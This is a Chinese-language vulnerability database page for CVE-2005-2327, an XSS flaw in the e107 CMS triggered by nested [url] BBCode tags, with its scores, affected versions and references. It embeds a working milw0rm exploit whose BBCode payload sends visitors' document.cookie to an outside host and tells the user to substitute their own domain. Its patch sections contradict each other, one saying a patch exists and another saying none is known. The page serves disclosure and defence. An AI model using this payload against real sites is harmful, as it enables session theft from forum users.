CVE-2005-2327
CVSS4.3
发布时间 :2005-07-20 00:00:00
修订时间 :2008-09-10 15:41:51
NMCOE    

[原文]Cross-site scripting (XSS) vulnerability in e107 0.617 and earlier allows remote attackers to inject arbitrary web script or HTML via nested [url] BBCode tags.


[CNNVD]e107 nested [url] BBCode 跨站脚本漏洞 (CNNVD-200507-241)

        e107是用PHP编写的内容管理系统,使用MYSQL数据库进行内容存储。
        e107 0.617及更早版本存在跨站脚本攻击(XSS)漏洞。远程攻击者可以通过nested [url] BBCode标记注入任意Web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:e107:e107:0.616
cpe:/a:e107:e107:5.4_beta5
cpe:/a:e107:e107:0.600
cpe:/a:e107:e107:5.4_beta3
cpe:/a:e107:e107:5.05
cpe:/a:e107:e107:0.547_beta
cpe:/a:e107:e107:0.601
cpe:/a:e107:e107:5.4_beta4
cpe:/a:e107:e107:5.21
cpe:/a:e107:e107:5.4_beta6
cpe:/a:e107:e107:0.608
cpe:/a:e107:e107:0.609
cpe:/a:e107:e107:5.4_beta1
cpe:/a:e107:e107:0.602
cpe:/a:e107:e107:0.549_beta
cpe:/a:e107:e107:0.611
cpe:/a:e107:e107:0.551_beta
cpe:/a:e107:e107:0.604
cpe:/a:e107:e107:0.605
cpe:/a:e107:e107:0.603
cpe:/a:e107:e107:0.548_beta
cpe:/a:e107:e107:0.606
cpe:/a:e107:e107:0.614
cpe:/a:e107:e107:5.1
cpe:/a:e107:e107:0.610
cpe:/a:e107:e107:0.607
cpe:/a:e107:e107:0.613
cpe:/a:e107:e107:0.553_beta
cpe:/a:e107:e107:0.615a
cpe:/a:e107:e107:5.04
cpe:/a:e107:e107:0.554_beta
cpe:/a:e107:e107:5.3_beta
cpe:/a:e107:e107:0.617
cpe:/a:e107:e107:0.552_beta
cpe:/a:e107:e107:5.3_beta2
cpe:/a:e107:e107:0.612
cpe:/a:e107:e107:0.555_beta

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2327
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2327
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-241
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1014513
(UNKNOWN)  SECTRACK  1014513
http://milw0rm.com/exploits/1106
(UNKNOWN)  MILW0RM  1106

- 漏洞信息

e107 nested [url] BBCode 跨站脚本漏洞
中危 跨站脚本
2005-07-20 00:00:00 2005-10-20 00:00:00
远程  
        e107是用PHP编写的内容管理系统,使用MYSQL数据库进行内容存储。
        e107 0.617及更早版本存在跨站脚本攻击(XSS)漏洞。远程攻击者可以通过nested [url] BBCode标记注入任意Web脚本或HTML。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://e107.org/news.php

- 漏洞信息 (1106)

e107 <= 0.617 XSS Remote Cookie Disclosure Exploit (EDBID:1106)
php webapps
2005-07-14 Verified
0 Warlord
N/A [点击下载]
/*
1) Change milw0rm.com to your domain.com
2) Post the below code into a new message.

Credits to Nick Griffin.

/str0ke
*/

[color=#EFEFEF][url]www.ut[url=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


# milw0rm.com [2005-07-14]
		

- 漏洞信息

18079
e107 BBcode Nested URL/Link Tag XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

e107 contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate [url] BBCode tags upon submission to the system. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2005-07-14 Unknow
2005-07-14 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站